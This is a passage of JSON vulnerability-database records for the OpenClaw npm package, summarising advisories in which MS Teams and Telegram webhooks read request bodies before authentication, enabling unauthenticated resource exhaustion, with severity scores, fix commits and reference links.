-4rg5-qjgq","reference_id":"GHSA-44c9-4rg5-qjgq","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-44c9-4rg5-qjgq"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-g99v-8hwm-g76g","reference_id":"GHSA-g99v-8hwm-g76g","reference_type":"","scores":[{"value":"7.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-g99v-8hwm-g76g"}],"fixed_packages":[],"aliases":["GHSA-44c9-4rg5-qjgq"],"risk_score":3.4,"exploitability":"0.5","weighted_severity":"6.7","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-t8e5-163r-37hc"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89218?format=json","vulnerability_id":"VCID-t991-75e7-ykdv","summary":"OpenClaw: MS Teams webhook parses body before JWT validation, enabling unauthenticated resource exhaustion\n## Summary\nMS Teams webhook parses body before JWT validation, enabling unauthenticated resource exhaustion\n\n## Current Maintainer Triage\n- Status: open\n- Normalized severity: medium\n- Assessment: v2026.3.28 still parses Teams JSON after only a Bearer-prefix gate and before real JWT validation, and the auth-before-parse fix is not yet shipped.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `3834d47099dd13c8244ed6de8b9ea9855c553623` — 2026-03-30T13:46:40+01:00\n\nOpenClaw thanks @AntAISecurityLab for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41405","reference_id":"","reference_type":"","scores":[{"value":"0.00228","scoring_system":"epss","scoring_elements":"0.45732","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00228","scoring_system":"epss","scoring_elements":"0.45716","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00228","scoring_system":"epss","scoring_elements":"0.45736","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41405"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/3834d47099dd13c8244ed6de8b9ea9855c553623","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/3834d47099dd13c8244ed6de8b9ea9855c553623"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-p464-m8x6-vhv8","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-p464-m8x6-vhv8"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41405","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41405"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-resource-exhaustion-via-unauthenticated-ms-teams-webhook-body-parsing","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-resource-exhaustion-via-unauthenticated-ms-teams-webhook-body-parsing"},{"reference_url":"https://github.com/advisories/GHSA-p464-m8x6-vhv8","reference_id":"GHSA-p464-m8x6-vhv8","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-p464-m8x6-vhv8"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109907?format=json","purl":"pkg:npm/openclaw@2026.3.31","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"}],"aliases":["CVE-2026-41405","GHSA-p464-m8x6-vhv8"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-t991-75e7-ykdv"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91290?format=json","vulnerability_id":"VCID-tdjc-vav8-97cf","summary":"OpenClaw Telegram webhook request bodies were read before secret validation, enabling unauthenticated resource exhaustion\n### Summary\n`openclaw` versions `<= 2026.3.12` read and buffered Telegram webhook request bodies before validating `x-telegram-bot-api-secret-token`. This let unauthenticated callers force up to the configured webhook body limit of pre-auth body I/O and JSON parse work per request.\n\n### Affected Packages / Versions\n- Package: `openclaw` (`npm`)\n- Affected versions: `<= 2026.3.12`\n- Fixed version: `2026.3.13`\n\n### Details\nThe vulnerable path was the standalone Telegram webhook listener in `src/telegram/webhook.ts`. In affected releases, the request handler accepted `POST` requests, called `readJsonBodyWithLimit(...)`, and only then checked the Telegram secret header. Because the secret validation happened after body reading, an unauthenticated caller could make the server spend memory, socket time, and JSON parse work on requests that should have been rejected before any body processing.\n\nThis issue is in scope under OpenClaw's trust model because the Telegram webhook endpoint accepts untrusted network traffic and the secret header is the authentication boundary for that ingress path.\n\n### Fix\n`openclaw@2026.3.13` validates the Telegram webhook secret before any body I/O. Current code reads the header, rejects invalid requests immediately with `401`, and only calls `readJsonBodyWithLimit(...)` after `hasValidTelegramWebhookSecret(...)` succeeds.\n\nRegression coverage exists in `src/telegram/webhook.test.ts` (`rejects unauthenticated requests before reading the request body`).\n\n### Fix Commit(s)\n- `7e49e98f79073b11134beac27fdff547ba5a4a02`\n\nThanks @space08 for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-32980","reference_id":"","reference_type":"","scores":[{"value":"0.00041","scoring_system":"epss","scoring_elements":"0.12887","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00041","scoring_system":"epss","scoring_elements":"0.12851","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00041","scoring_system":"epss","scoring_elements":"0.1289","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-32980"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/7e49e98f79073b11134beac27fdff547ba5a4a02","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-30T16:02:47Z/"}],"url":"https://github.com/openclaw/openclaw/commit/7e49e98f79073b11134beac27fdff547ba5a4a02"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-jq3f-vjww-8rq7","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-30T16:02:47Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-jq3f-vjww-8rq7"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32980","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32980"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-resource-exhaustion-via-unauthenticated-telegram-webhook-request","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-30T16:02:47Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-resource-exhaustion-via-unauthenticated-telegram-webhook-request"},{"reference_url":"https://github.com/advisories/GHSA-jq3f-vjww-8rq7","reference_id":"GHSA-jq3f-vjww-8rq7","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-jq3f-vjww-8rq7"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/113139?format=json","purl":"pkg:npm/openclaw@2026.3.13","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VC